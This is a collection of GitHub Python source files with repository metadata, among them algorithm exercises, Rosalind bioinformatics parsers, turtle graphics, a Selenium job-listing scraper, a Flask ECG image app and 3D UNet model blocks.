graph=collections.defaultdict(list)\n for each in prerequisites:\n graph[each[1]].append(each[0])\n\n visited=[False]*numCourses\n visiting=[False]*numCourses\n\n for c in range(numCourses):\n if(not visited[c]) and detect_cycle(c):\n return []\n visited=[False]*numCourses\n ans=[]\n for t in range(numCourses):\n if(not visited[t]):\n topological_sort(t)\n ans.reverse()\n return ans\n","repo_name":"faisal-git/Data_Structure","sub_path":"Graphs/Toplogical_sort.py","file_name":"Toplogical_sort.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"70762470189","text":"readings = [13.5, 11.1, 17.5, 12.6, 15.3, 12.2, 16.6, 14.6]\n\n\n\n# Step 1: Implement a function to average the temperatures\ndef average(data):\n return sum(data) / len(data)\n\nprint('Starting')\nprint(average(readings))\nprint('Average temperature = {:.2f}'.format(average(readings)))\nprint(f'Average temperature = {average(readings):.2f}')\nprint('Done', (\"-\" * 30))\n\n\n# Step 2: Calculate the median of the data\ndef median(data):\n sorted_data = sorted(data) # Sort the data\n data_length = len(data) # Get the length of the data\n index = (data_length - 1) // 2 # Calculate the index for the median\n\n if data_length % 2 == 1: # Check if the data length is odd\n return sorted_data[index] # Return the value at the calculated index\n else:\n # If the data length is even, calculate the average of the two middle values\n return (sorted_data[index] + sorted_data[index + 1]) / 2.0\n\n\n# Print the median\nprint(f'Median temperature value = {median(readings)}')\nprint('Done', (\"-\" * 30))\n\n\n# minimum and maximum functions\ndef minimum(data, start=0):\n if start < 0 or start >= len(data):\n return None # Invalid 
 start position\n\n    min_value = float('inf') # Initialize with positive infinity\n\n    for i in range(start, len(data)):\n        if data[i] < min_value:\n            min_value = data[i]\n\n    return min_value\n\n\nprint(f'Min temp in list = {minimum(readings)}')\nprint(f'Min temp in list starting position 4 = {minimum(readings, 3)}')\nprint('Done', (\"-\" * 30))\n\n\ndef maximum(data, start=0):\n    if start < 0 or start >= len(data):\n        return None # Invalid start position\n\n    max_value = float('-inf') # Initialize with negative infinity\n\n    for i in range(start, len(data)):\n        if data[i] > max_value:\n            max_value = data[i] # use the parameter, not the global readings list\n\n    return max_value\n\n\nprint(f'Max temp in list = {maximum(readings)}')\nprint(f'Max temp in list starting position 4 = {maximum(readings, 3)}')\nprint('Done', (\"-\" * 30))\n\n\n# Return a data range tuple\ndef data_range(data):\n    if not data:\n        return None # Return None if the list is empty\n\n    min_temp = float('inf')\n    max_temp = float('-inf')\n\n    for temperature in data:\n        if temperature < min_temp:\n            min_temp = temperature\n        if temperature > max_temp:\n            max_temp = temperature\n\n    return min_temp, max_temp # Return a tuple\n\n\nmin_temp, max_temp = data_range(readings)\nprint(f'Range of temperatures from {min_temp} to {max_temp}')\nprint('Done', (\"-\" * 30))\n\n\n# Convert Celsius to Fahrenheit\ndef celsius_to_fahrenheit(celsius):\n    return (celsius * 9 / 5) + 32\n\n\ntemperature_celsius = 13.5\ntemperature_fahrenheit = celsius_to_fahrenheit(temperature_celsius)\n\nprint(f'{temperature_celsius} Celsius as Fahrenheit: {temperature_fahrenheit:.2f}')\nprint('Done', (\"-\" * 30))\n\n\n# Convert Fahrenheit into Celsius\ndef fahrenheit_to_celsius(fahrenheit):\n    return (fahrenheit - 32) * 5 / 9\n\n\nprint(f'56.3 fahrenheit as celsius - {fahrenheit_to_celsius(56.3):.1f}')\nprint('Done', (\"-\" * 30))\n","repo_name":"momahboobian/python-p","sub_path":"_D2/main_bin5.py","file_name":"main_bin5.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"71621669867","text":"import sys\n\nfrom app.SpelloutApp import SpelloutApp\nfrom gui.Gui import Gui\n\n\ndef main():\n    try:\n        app = SpelloutApp()\n        if len(sys.argv) > 1:\n            app.load_session(sys.argv[1])\n\n        gui = Gui(app)\n        gui.run_blocking()\n    except RuntimeError as e:\n        sys.stderr.write(str(e) + '\\n')\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"goc9000/spellout","sub_path":"src/spellout.py","file_name":"spellout.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"32445236759","text":"import os\npath = \"C:/Users/yasha/Desktop/Python Programming/Rosalind/Data\"\n\ntext = \"\"\"\n>Rosalind_6404\nCCTGCGGAAGATCGGCACTAGAATAGCCAGAACCGTTTCTCTGAGGCTTCCGGCCTTCCC\nTCCCACTAATAATTCTGAGG\n>Rosalind_5959\nCCATCGGTAGCGCATCCTTAGTCCAATTAAGTCCCTATCCAGGCGCTCCGCCGAAGGTCT\nATATCCATTTGTCAGCAGACACGC\n>Rosalind_0808\nCCACCCTCGTGGTATGGCTAGGCATTCAGGAACCGGAGAACGCTTCAGACCAGCCCGGAC\nTGGGAACCTGCGGGCAGTAGGTGGAAT\n\"\"\"\n\ndef gc_content(seq):\n    ls = list(seq)\n    gc = ls.count('C') + ls.count('G')\n    return(gc / len(ls) * 100)\n\ndef parse_fasta(file):\n    with open(os.path.join(path, file), \"rt\", newline='') as f:\n        gc_content_for_ids = {}\n        text_list = f.read().splitlines()\n\n        for i, line in enumerate(text_list):\n            if line.startswith('>'):\n                id = line.strip('>')\n                # get next line, containing genomic data\n                bp_sequence, bp_idx = \"\", i+1\n
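                # collect sequence lines until the next '>' header (or end of input)\n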
                while(bp_idx < len(text_list)):\n                    seq = text_list[bp_idx]\n                    if not seq.startswith('>'):\n                        bp_sequence = bp_sequence + seq\n                        bp_idx += 1\n                    else:\n                        break\n                # parse\n                gc_score_id = gc_content(bp_sequence)\n                gc_content_for_ids[gc_score_id] = id\n\n        mx_gc = max(gc_content_for_ids.keys())\n        print(gc_content_for_ids.get(mx_gc))\n        print(mx_gc)\n\n# better version...\ndef parse_fasta_(file):\n    with open(os.path.join(path, file), \"r\", newline='') as f:\n        gc_content_for_ids = {}\n        hasline = True\n        line = f.readline().rstrip()\n\n        while(hasline):\n            if line.startswith('>'):\n                id = line.strip('>')\n                bp_sequence = \"\"\n                line = f.readline().rstrip()\n                while line != '': # compare with !=, not 'is not': string identity is unreliable\n                    if not line.startswith('>'):\n                        bp_sequence = bp_sequence + line\n                        line = f.readline().rstrip()\n                    else:\n                        break\n                # parse\n                gc_score_id = gc_content(bp_sequence)\n                gc_content_for_ids[gc_score_id] = id\n\n            if(line == ''):\n                print(\"Finished Parsing\")\n                hasline = False\n        mx_gc = max(gc_content_for_ids.keys())\n        print(gc_content_for_ids.get(mx_gc))\n        print(mx_gc)\n\n\nif __name__ == \"__main__\":\n    parse_fasta(\"old/rosalind_gc.txt\")\n    parse_fasta_(\"old/rosalind_gc.txt\")\n
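# note: parse_fasta loads the whole file via read().splitlines(), while parse_fasta_ streams it one readline() at a time\n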
Try again.\")\n\n# for seq in seqarray:\n# gccount = seq.count('G') + seq.count('C')\n# totcount = len(seq)\n# seqgc.append(100*gccount/totcount)\n\n# # Find the max value and index and return the fasta id and %gc\n# max_gc = max(seqgc)\n# max_index = seqgc.index(max_gc)\n\n# print fastaids[max_index]\n# print max_gc","repo_name":"jshkrob/Rosalind-Answers","sub_path":"Code/GC-Content.py","file_name":"GC-Content.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71330160749","text":"# The isBadVersion API is already defined.\n# def isBadVersion(version: int) -> bool:\n\ndef binSearch(self, l, r):\n # if r - l == 0:\n # return False\n mid = (l + r) // 2\n\n if isBadVersion(mid) == False:\n if isBadVersion(mid + 1) == True:\n return mid + 1\n else:\n return binSearch(self, mid + 1, r)\n\n else:\n if isBadVersion(mid - 1) == False:\n return mid\n else:\n return binSearch(self, l, mid - 1)\n\n\nclass Solution:\n def firstBadVersion(self, n: int) -> int:\n l = 1\n r = n\n\n x = (binSearch(self, l, r))\n\n return x\n","repo_name":"shubh-2012/DSAwithPython","sub_path":"Leetcode/firstBadVersion.py","file_name":"firstBadVersion.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1653005819","text":"import turtle\n\n# changing line color\n# painter = turtle.Turtle()\n#\n# painter.pencolor(\"blue\")\n# for i in range(50):\n# painter.forward(50)\n# painter.left(123) # Let's go counterclockwise this time\n#\n# painter.pencolor(\"red\")\n# for i in range(50):\n# painter.forward(100)\n# painter.left(123)\n\n\n\n# changing line color https://www.webpagefx.com/web-design/color-picker/\n# painter2 = turtle.Turtle()\n#\n# painter2.pencolor(\"#32D486\")\n# painter2.forward(90)\n#\n# painter2.pencolor(\"#D6305F\")\n# painter2.forward(90)\n\n\n\n# nested loops\n# seurat = turtle.Turtle()\n#\n# dot_distance = 25\n# width = 5\n# height = 7\n#\n# seurat.penup()\n#\n# for y in range(height):\n# for i in range(width):\n# seurat.dot()\n# seurat.forward(dot_distance)\n# seurat.backward(dot_distance * width)\n# seurat.right(90)\n# seurat.forward(dot_distance)\n# seurat.left(90)\n\n\n\n# jumping around and changing speed\n# The speed cannot be lesser then 0 or greater then 10. 0=warpspeed and will draw as fast as it can\n# turtle.setposition(x, y) will set the turtle’s position to the coordinates you plug in. 
(0, 0) is located at the center of the screen\n\nninja = turtle.Turtle()\n\nninja.speed(0)\n\nfor i in range(180):\n ninja.forward(100)\n ninja.right(30)\n ninja.forward(20)\n ninja.left(60)\n ninja.forward(50)\n ninja.right(30)\n\n ninja.penup()\n ninja.setposition(0, 0)\n ninja.pendown()\n\n ninja.right(2)\n\n\nturtle.done()","repo_name":"Miky9/Py-BasicSyntax","sub_path":"PyCode_Ostrava_2017/02_turtle2.py","file_name":"02_turtle2.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32809965791","text":"\"\"\"\nCreated on Sat Jun 12 20:47:42 2021\n\nCredit: Kenarapfaik\n@author: Olohireme\nurl: https://github.com/arapfaik/scraping-glassdoor-selenium\n\"\"\"\nfrom selenium.common.exceptions import NoSuchElementException, ElementClickInterceptedException\nfrom selenium import webdriver\nimport time\nimport pandas as pd\nfrom time import sleep\nimport random\n\npath = '/opt/homebrew/bin/chromedriver'\n\ndef get_jobs(keyword, num_jobs, verbose):\n \n #Initializing the webdriver\n options = webdriver.ChromeOptions()\n \n\n #Change the path to where chromedriver is in your home folder.\n driver = webdriver.Chrome(executable_path=path, options=options)\n driver.set_window_size(1120, 1000)\n \n url = 'https://ca.indeed.com/jobs?l=Canada'\n driver.get(url)\n \n advanced_search = driver.find_element_by_xpath(\"//a[contains(text(),'Advanced Job Search')]\")\n advanced_search.click()\n \n #search data science \n search_job = driver.find_element_by_xpath('//input[@id=\"as_and\"]')\n search_job.send_keys(['data scientist'])\n #set display limit of 30 results per page\n display_limit = driver.find_element_by_xpath('//select[@id=\"limit\"]//option[@value=\"50\"]')\n display_limit.click()\n #sort by date\n sort_option = driver.find_element_by_xpath('//select[@id=\"sort\"]//option[@value=\"date\"]')\n sort_option.click()\n search_button = driver.find_element_by_xpath('//*[@id=\"fj\"]')\n search_button.click()\n \n close_popup = driver.find_element_by_xpath('//div[@id=\"popover-x\"]/button')\n close_popup.click()\n #select only English jobs\n lang_div = driver.find_element_by_xpath('//*[@id=\"filter-language\"]/button')\n lang_div.click()\n filter_lang = driver.find_element_by_xpath('//ul[@id=\"filter-language-menu\"]/li[1]')\n filter_lang.click()\n \n driver.implicitly_wait(3) \n\n jobs = []\n\n\n while len(jobs) < num_jobs: #If true, should be still looking for new jobs.\n\n #Let the page load. 
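(a fixed sleep like this is brittle; an explicit wait such as selenium's WebDriverWait would be more reliable)\n        # 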
Change this number based on your internet speed.\n #Or, wait until the webpage is loaded, instead of hardcoding it.\n time.sleep(4)\n\n \n #Going through each job in this page\n job_buttons = driver.find_elements_by_xpath('//div[contains(@class,\"clickcard\")]')\n \n try:\n driver.find_element_by_css_selector('[alt=\"Close\"]').click() #clicking to the X.\n except NoSuchElementException:\n pass\n \n for job_button in job_buttons: \n\n print(\"Progress: {}\".format(\"\" + str(len(jobs)) + \"/\" + str(num_jobs)))\n if len(jobs) >= num_jobs:\n break\n print(\"here\")\n \n #be random to avoid CAPTCHA\n if len(jobs) % 15 == 0:\n try:\n link = job_button.find_element_by_xpath('.//span[@class=\"caption\"]//a').get_attribute(name=\"href\")\n except:\n link = \"None\"\n \n if len(jobs) % 25 == 0:\n inputElement = driver.find_element_by_id(\"alertemail\")\n inputElement.send_keys('1')\n try:\n link = job_button.find_element_by_xpath('.//h2[@class=\"title\"]//a').get_attribute(name=\"href\")\n except:\n link = \"None\"\n \n try:\n job_button.click() #You might \n except:\n try:\n driver.find_element_by_css_selector('[alt=\"Close\"]').click() #clicking to the X.\n except NoSuchElementException:\n pass\n \n sleepTimes = [2.1, 2.8, 3.2]\n sleep(random.choice(sleepTimes))\n #collected_successfully = False\n \n #while not collected_successfully:\n print(\"here\")\n try:\n company_name = driver.find_element_by_xpath('.//span[@id=\"vjs-cn\"]').text\n print(company_name)\n location = driver.find_element_by_xpath('.//span[@id=\"vjs-loc\"]').text\n print(location)\n job_title = driver.find_element_by_xpath('.//div[@id=\"vjs-jobtitle\"]').text\n print(job_title)\n job_description = driver.find_element_by_xpath('.//div[@id=\"vjs-desc\"]').text\n print(job_description[:30])\n # collected_successfully = True\n except:\n time.sleep(5)\n \n \n \n #Printing for debugging\n if verbose:\n print(\"Job Title: {}\".format(job_title))\n print(\"Job Description: {}\".format(job_description[:500]))\n print(\"Company Name: {}\".format(company_name))\n print(\"Location: {}\".format(location))\n \n \n \n jobs.append({\"Job Title\" : job_title,\n \"Job Description\" : job_description,\n \"Company Name\" : company_name,\n \"Location\" : location\n })\n \n #Clicking on the \"next page\" button\n try: \n next_page = driver.find_element_by_xpath('//a[@aria-label=\"Next\"]//span[@class=\"np\"]')\n next_page.click() \n except NoSuchElementException:\n print(\"Scraping terminated before reaching target number of jobs. 
Needed {}, got {}.\".format(num_jobs, len(jobs)))\n            break\n\n    return pd.DataFrame(jobs)\n\ndf = get_jobs('data science', 500, False)\n\ndf.to_csv('glassdoor_jobs.csv')","repo_name":"RemeAjayi/ds-job-detective","sub_path":"indeed-other-scraper.py","file_name":"indeed-other-scraper.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
{"seq_id":"27370659354","text":"arr = list(map(int, input().split()))\nn = len(arr)\n# Find the left most element which\n# will be the starting of unsorted array\nfor l in range(n-1):\n    if arr[l] > arr[l+1]:\n        break\nelse:\n    # for/else: the loop finished without a break, so the array is already sorted\n    print('Sorted array')\n\n# Find the ending of unsorted array\nfor r in range(n-1, 0, -1):\n    if arr[r] < arr[r-1]:\n        break\n\nmax_ = arr[l]\nmin_ = arr[r]\n\n# Find the min and max of the unsorted section\nfor i in range(l+1, r+1):\n    if arr[i] > max_:\n        max_ = arr[i]\n    if arr[i] < min_:\n        min_ = arr[i]\n\n# Check if any element in LHS sorted section is greater than min\nfor i in range(0,l):\n    if arr[i] > min_:\n        l = i\n        break\n\n# Check if any element in RHS sorted section is smaller than max\nfor i in range(n-1, r,-1):\n    if arr[i] < max_:\n        r = i\n        break\n\nprint(\"starting index of unsorted array: \", l)\nprint(\"last index of unsorted array: \", r)\n","repo_name":"mzfr/Competitive-coding","sub_path":"Arrays/min-unsorted-subarray/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"34665839894","text":"import numpy as np\nimport random\n\n\"\"\"\nYOUR FULL NAME HERE\nYOUR STUDENT ID HERE\n\nASSIGNMENT: COMPLETE randomPlay and randomGame functions below\n\"\"\"\n\n\"\"\"\nECE 105: Programming for Engineers 2\nCreated September 3, 2020\nSteven Weber\n\nModified April 4, 2023\nNaga Kandasamy\n\nConnect4 Starter Code\n\nThis code plays a random game of Connect 4 and checks for a win condition\nThe __main__ method will repeatedly play until a game with no winner is found\n\nVariable convention:\nnr: number of rows\nnc: number of columns\nb: board (6 rows, 7 columns)\nc: column (1 of 7)\nr: row (1 of 6)\np: player index (1 or 2)\n\"\"\"\n\n# Create the board with the initial state\n\n\ndef initBoard(nr, nc):\n    # Create board as numpy 2D array, initialized to hold zeros\n    return np.zeros((nr, nc), dtype=int)\n\n# Find the row when placing a piece in a given column\n\n\ndef findRow(b, c):\n    # get the number of rows\n    nr = b.shape[0]\n    # get the column from the board, convert to list\n    col = list(b[:, c])\n    # reverse the list (start from bottom)\n    rev_col = col[::-1]\n    # get the (row) index of the first 0 in the reversed list\n    rri = rev_col.index(0)\n    # return this position in the original list\n    return nr - 1 - rri\n\n# Get list of all open (non-full) columns in board\n\n\ndef openCols(b):\n    open_cols = []\n    # iterate over column indices j\n    for j in range(b.shape[1]):\n        # add j to open_cols if it contains a 0\n        if 0 in b[:, j]:\n            open_cols.append(j)\n    return open_cols\n\n\n\"\"\"\nCOMPLETE:\nrandomPlay takes board b and player p\n1. open_cols: get list of open column indices\n2. c: choose column index at random from open_cols\n3. call findRow(b,c) to get row index for that column\n4. b[r,c]: assign b[r,c] with player index p\n5. b: return the board\n\"\"\"\n# Make a random play for player p\n\n\ndef randomPlay(b, p):\n    # 1. open_cols: get list of open column indices\n    open = openCols(b)\n    # 2. 
c: choose column index at random from open_cols\n # print(f\"open cols{open} length {len(open)}\")\n colidx = random.randint(0, len(open)-1)\n # 3. r: call findrow(b,c) to get row index for that column\n row = findRow(b, open[colidx])\n # 4. b[r,c]: assign b[r,c] with player index p\n # print(f\"row{row}|col{open[colidx]}\")\n b[row, open[colidx]] = p\n # print(b)\n # 5. b: return the board\n return b\n\n# Check if the board is full\n\n\ndef boardFull(b):\n # board is full iff there are no open columns\n return False if openCols(b) else True\n\n\n\"\"\"\nCOMPLETE:\nrandomGame takes board b and repeatedly calls randomPlay:\n1. stopping criterion is that the board is not full\n2. get an updated board by calling randomPlay\n3. check the updated board to see if a player has won, if yes, return board\n4. update the player index (from 1 to 2, or from 2 to 1)\n\"\"\"\n# Play a random game\n\n\ndef randomGame(b):\n p = 1 # player 1 goes first\n # continue to play until board is full\n # replace True with stopping criterion using boardFull(b)\n while not boardFull(b):\n # print(f\"board full {boardFull(b)}\")\n # print(b)\n # make a random play\n randomPlay(b, p)\n # check for a win\n ckWin(b)\n if ckWin(b):\n return b\n # toggle player\n if p == 1:\n p = 2\n elif p == 2:\n p = 1\n # board is full\n return b\n\n# Check board to see if either player has won the game\n\n\ndef ckWin(b):\n # w1 is True if player 1 wins, w2 is True if player 2 wins\n w1 = any([ckRows(b, 1), ckCols(b, 1), ckDiagsFor(b, 1), ckDiagsRev(b, 1)])\n w2 = any([ckRows(b, 2), ckCols(b, 2), ckDiagsFor(b, 2), ckDiagsRev(b, 2)])\n return w1 or w2\n\n# Check each row for a win for player p\n\n\ndef ckRows(b, p):\n # check each row r in b\n return any([ckArray(r, p) for r in b])\n\n# Check each column for a win for player p\n\n\ndef ckCols(b, p):\n # check each column c in b\n return any([ckArray(c, p) for c in b.T])\n\n# Check each forward diagonal for a win for player p\n\n\ndef ckDiagsFor(b, p):\n # offset indices for the diagonals of length 4 or more\n dMin, dMax = -2, 4\n # check each diagonal in b by specifying the offset d\n return any([ckArray(np.diagonal(b, d), p) for d in range(dMin, dMax)])\n\n# Check each reverse diagonal for a win for player p\n\n\ndef ckDiagsRev(b, p):\n # reverse the board: reverse diags in b are forward diags in bf\n bf = np.fliplr(b)\n # offset indices for the diagonals of length 4 or more\n dMin, dMax = -2, 4\n # check each diagonal in bf by specifying the offset d\n return any([ckArray(np.diagonal(bf, d), p) for d in range(dMin, dMax)])\n\n# Check if winning pattern is in array (converted to strings)\n\n\ndef ckArray(a, p):\n # convert the numpy 1-dim array a to a string s (no spaces)\n s = np.array2string(a, separator='')[1:-1]\n # construct the winning pattern for the given player ass ws\n ws = '1111' if p == 1 else '2222'\n # check for the winning pattern (ws) in the array string (s)\n return True if ws in s else False\n\n\n# Main program\nif __name__ == \"__main__\":\n # Connect4 board has 6 rows and 7 columns\n nr, nc = 6, 7\n\n # Repeatedly play a random game until there is no winner\n n, b = 0, []\n print(\"set up complete running game playing game\")\n while b == [] or ckWin(b) == True: # ckWin(b) is True if there is a winner\n print(f\"game number {n}\")\n b = randomGame(initBoard(nr, nc)) # random game board\n n += 1 # number of games played\n\n # Print board, # attempts, and win status of board\n print(b)\n print(n)\n 
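# the while-loop above only exits when ckWin(b) is False, so this final check should print False (a drawn, full board)\n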
    print(ckWin(b))\n","repo_name":"0r-ion/masterworks","sub_path":"ECE105/labs/lab1/Lab1-StarterCode.py","file_name":"Lab1-StarterCode.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"10646921285","text":"import sys\n\nfrom cellworld_experiment_service import ExperimentClient\n\nsubject_name = sys.argv[1]\nocclusions = sys.argv[2]\n\nclient = ExperimentClient()\nclient.connect()\nprint(client.start_experiment(prefix=\"HUMAN\", suffix=\"TEST\", subject_name=subject_name, world_configuration=\"hexagonal\", world_implementation=\"vr\", occlusions=occlusions, duration=10))\n","repo_name":"germanespinosa/vr_service","sub_path":"python/start_experiment.py","file_name":"start_experiment.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37729959712","text":"import sys\nsys.path.append('D:\\Semester 6\\Heart-Disease-Prediction-from-ECG-through-Image--Processing\\Ecg.py')\n\nfrom flask import Flask, request, render_template, url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom Ecg import ECG\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'static/uploads'\napp.config['ALLOWED_EXTENSIONS'] = {'png', 'jpg', 'jpeg', 'gif'}\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n    if request.method == 'POST':\n        file = request.files['file']\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n            if not os.path.exists(app.config['UPLOAD_FOLDER']):\n                os.makedirs(app.config['UPLOAD_FOLDER'])\n            file.save(filepath)\n\n            # Create an instance of the ECG class\n            ecg_processor = ECG()\n\n            # Instead of getImage(), use the uploaded file\n            # image_path = ecg_processor.getImage()\n\n            # Process the uploaded ECG image\n            # You may need to adjust the methods of ECG class to accept the filepath directly\n            ecg_processor.displayImage(filepath)\n            gray_image = ecg_processor.GrayImgae(filepath)\n            leads = ecg_processor.DividingLeads(filepath)\n            ecg_processor.PreprocessingLeads(leads)\n            ecg_processor.SignalExtraction_Scaling(leads)\n            final_data = ecg_processor.CombineConvert1Dsignal()\n            reduced_data = ecg_processor.DimensionalReduciton(final_data)\n            classification_result = ecg_processor.ModelLoad_predict(reduced_data)\n\n            # You would need to implement the logic to gather image file names for rendering\n            # images = ['list_of_processed_image_filenames']\n            images = [] # placeholder so the render call below has a defined value; fill with processed image filenames\n\n            # Render the results template with the classification result and images\n            return render_template('result.html', result=classification_result, images=images)\n\n    return render_template('upload.html')\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"HaroonMalik771/Heart-Disease-Prediction-from-ECG-through-Image--Processing","sub_path":"ecg/web/ecg_web_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"5754795","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nfrom torch.nn import functional as F\r\n\r\n# ****************************************************************************************\r\n# ----------------------------------- Unet Basic 
blocks -------------------------------\r\n# ****************************************************************************************\r\nclass UNetEncoder(nn.Module):\r\n def __init__(self, in_channels=1, feature_maps=64, levels=4, norm_type='instance', use_dropout=True, bias=True):\r\n super(UNetEncoder, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n self.use_dropout = use_dropout\r\n if self.use_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n in_features = in_channels\r\n for i in range(levels):\r\n out_features = (2**i) * feature_maps\r\n\r\n conv_block = UNetConvBlock3D(in_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n pool = nn.MaxPool3d(kernel_size=2, stride=2)\r\n self.features.add_module('pool%d' % (i+1), pool)\r\n\r\n in_features = out_features\r\n\r\n\r\n def forward(self, inputs):\r\n encoder_outputs = []\r\n outputs = inputs\r\n for i in range(self.levels):\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n\r\n if i == self.levels-1:\r\n continue\r\n if self.use_dropout:\r\n encoder_outputs.append(self.dropout(outputs))\r\n else:\r\n encoder_outputs.append(outputs)\r\n outputs = getattr(self.features, 'pool%d' % (i+1))(outputs)\r\n\r\n return encoder_outputs, outputs\r\n\r\nclass UNetEncoder_hved(nn.Module):\r\n def __init__(self, in_channels=1, feature_maps=64, levels=4, norm_type='instance', use_dropout=True, bias=True):\r\n super(UNetEncoder_hved, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n self.use_dropout = use_dropout\r\n if self.use_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n in_features = in_channels\r\n for i in range(levels):\r\n out_features = (2**i) * feature_maps\r\n\r\n conv_block = UNetConvBlock3D_hved(in_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n pool = nn.MaxPool3d(kernel_size=2, stride=2)\r\n self.features.add_module('pool%d' % (i+1), pool)\r\n\r\n in_features = out_features\r\n\r\n\r\n def forward(self, inputs):\r\n encoder_outputs = []\r\n outputs = inputs\r\n for i in range(self.levels):\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n\r\n if i == self.levels-1:\r\n continue\r\n if self.use_dropout:\r\n encoder_outputs.append(self.dropout(outputs))\r\n else:\r\n encoder_outputs.append(outputs)\r\n outputs = getattr(self.features, 'pool%d' % (i+1))(outputs)\r\n\r\n return encoder_outputs, outputs\r\n\r\nclass UNetDecoder(nn.Module):\r\n def __init__(self, out_channels, feature_maps=64, levels=4, norm_type='instance', bias=True):\r\n super(UNetDecoder, self).__init__()\r\n self.out_channels = out_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n\r\n for i in range(levels-1):\r\n upconv = UNetUpSamplingBlock3D(2**(levels-i-1) * feature_maps, 2**(levels-i-1) * feature_maps, deconv=False,\r\n bias=bias)\r\n self.features.add_module('upconv%d' % (i+1), upconv)\r\n\r\n conv_block = UNetConvBlock3D(2**(levels-i-2) * feature_maps * 3, 2**(levels-i-2) * feature_maps,\r\n norm_type=norm_type, bias=bias, flag='decoder')\r\n\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n self.score = nn.Conv3d(feature_maps, out_channels, kernel_size=1, stride=1, 
bias=bias)\r\n\r\n def forward(self, inputs, encoder_outputs):\r\n encoder_outputs.reverse()\r\n outputs = inputs\r\n for i in range(self.levels-1):\r\n outputs = getattr(self.features, 'upconv%d' % (i+1))(outputs)\r\n outputs = torch.cat([encoder_outputs[i], outputs], dim=1)\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n encoder_outputs.reverse()\r\n return self.score(outputs)\r\n\r\nclass UNetDecoder_hved(nn.Module):\r\n def __init__(self, out_channels, feature_maps=64, levels=4, norm_type='instance', bias=True):\r\n super(UNetDecoder_hved, self).__init__()\r\n self.out_channels = out_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n\r\n for i in range(levels-1):\r\n upconv = UNetUpSamplingBlock3D(2**(levels-i-1) * feature_maps, 2**(levels-i-1) * feature_maps, deconv=False,\r\n bias=bias)\r\n self.features.add_module('upconv%d' % (i+1), upconv)\r\n\r\n conv_block = UNetConvBlock3D_hved(2**(levels-i-2) * feature_maps * 3, 2**(levels-i-2) * feature_maps,\r\n norm_type=norm_type, bias=bias, flag='decoder')\r\n\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n self.score = nn.Conv3d(feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n\r\n def forward(self, inputs, encoder_outputs):\r\n encoder_outputs.reverse()\r\n outputs = inputs\r\n for i in range(self.levels-1):\r\n outputs = getattr(self.features, 'upconv%d' % (i+1))(outputs)\r\n outputs = torch.cat([encoder_outputs[i], outputs], dim=1)\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n encoder_outputs.reverse()\r\n return self.score(outputs)\r\n\r\nclass UNetUpSamplingBlock3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, deconv=False, bias=True):\r\n super(UNetUpSamplingBlock3D, self).__init__()\r\n self.deconv = deconv\r\n if self.deconv:\r\n self.up = nn.ConvTranspose3d(in_channels, out_channels, kernel_size=3, stride=2, padding=1)\r\n else:\r\n self.up = nn.Upsample(scale_factor=2, mode='trilinear', align_corners=True)\r\n\r\n def forward(self, *inputs):\r\n if len(inputs) == 2:\r\n return self.forward_concat(inputs[0], inputs[1])\r\n else:\r\n return 